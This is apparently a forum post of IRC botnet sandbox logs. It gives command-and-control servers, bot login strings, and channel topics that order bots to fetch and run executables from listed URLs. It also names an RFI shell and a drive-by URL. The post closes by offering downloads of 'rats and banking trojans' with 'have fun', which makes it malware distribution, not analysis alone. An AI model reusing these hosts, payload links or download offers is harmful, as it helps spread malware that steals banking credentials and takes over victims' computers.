Author: Pig

Remote Host Port Number yesim.hoodrich.ru:4042 Resolved : [yesim.hoodrich.ru] To [216.131.127.13] 216.131.127.13 4042 89.201.164.126 80 NICK new[USA|XP|COMPUTERNAME]pethrmn USER xD “” “lol” :xD JOIN #biznew# PONG 422 PONG :irc.priv8net4.com C&C Server: 64.69.44.51:4042 Server Password: Username: hh Nickname: new[DEU|XP|DELL-D3E62F7E26]tmlnhjx Channel: #biznew# (Password: ) Channeltopic: :!down /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/57/38/42/59/51/59/52/20/52/54/38/67/114/97/97/40/105/109/102/ * The data identified by the following URL was then requested fromRead more...

Remote Host Port Number 213.251.170.52 80 91.211.117.81 80 91.211.117.46 1865 PASS ngrBot NICK n{US|XPa}ruzgvfp USER ruzgvfp 0 0 :ruzgvfp JOIN #main 4m3r1k4 QUIT :rebooting Now talking in #main Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ] Topic By: [ RamzGallagher ] hosting infos: http://whois.domaintools.com/91.211.117.46

Exe file: http://123back.com/1.EXE Java drive by: http://123back.com/ * The following Host Names were requested from a host database: o sam.chatsmate.com o ms.tvchatz.com o chatsmate.com o justchatz.com o tvchatz.com sam.chatsmate.com ms.tvchatz.com chatsmate.com justchatz.com UDP Connections Remote IP Address: Port: 7202 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address:Read more...

Mostly botnets and baking trojans have fun Download: http://e422237e.tubeviral.com

Remote Host Port Number 193.106.172.131 1863 PASS ngrBot 213.251.170.52 80 NICK n{US|XPa}hvjyted USER hvjyted 0 0 :hvjyted JOIN #80t35ref 1963.g3rb3rs1t0.3691 UPDATE: NICK n{US|XPa}llwonwe USER llwonwe 0 0 :llwonwe JOIN #80t35ref 1963.g3rb3rs1t0.3691 Now talking in #80t35ref Topic On: [ #80t35ref ] [ *pu http://vector7.net/pOUI712yd.exe 0bba6a00254d8eec745e831e1e90d75d ] Topic By: [ cholo ] hosting infos: http://whois.domaintools.com/193.106.172.131

Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126] Remote Host Port Number 184.107.143.126 2009 and 6667 PASS ngrBot 213.251.170.52 80 70.85.227.66 80 PRIVMSG #root :[HTTP]: Updated HTTP spread message to “juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S” PRIVMSG #root :[d=”http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE” s=”143360 bytes”] Executed fileRead more...

Remote Host Port Number 205.185.122.148 6667 PASS nickz23 205.185.122.148 80 NICK {NEW}[USA][XP-SP2]976017 USER 4242 “” “lol” :4242 PONG :D78F0ECE JOIN #bots * The data identified by the following URL was then requested from the remote web server: o http://ziggy.no-ip.org/lsass.exe hosting infos: http://whois.domaintools.com/205.185.122.148

Remote Host Port Number 209.172.59.146 5794 PASS ngrBot 213.251.170.52 80 74.53.197.4 80 NICK n{US|XPa}pvcbajf USER pvcbajf 0 0 :pvcbajf JOIN #butowski ngrBot PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s) The data identified by the following URLs was then requested from the remote web server: http://api.wipmania.com/ http://conectaamor.com/_server/editor/images/dominios.txt EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe RFI SHELL: http://conectaamor.com/_server/editor/images/lang.phpRead more...

50.28.21.18:8890 Nick: New|AUT|1244036|XP Username: 7665336 Joined Channel: #pedophiliac with Password YDARIO Remote Host Port Number 50.28.21.18 7659 PASS fuck NICK [3151|USA|XP|Z3R0x] USER 3151 “” “lol” :3151 JOIN #pedophiliac YDARIO PONG 422 hosting infos: http://whois.domaintools.com/50.28.21.18

This package have alot of rats and banking trojans inside have fun Download: http://c3266cfc.tubeviral.com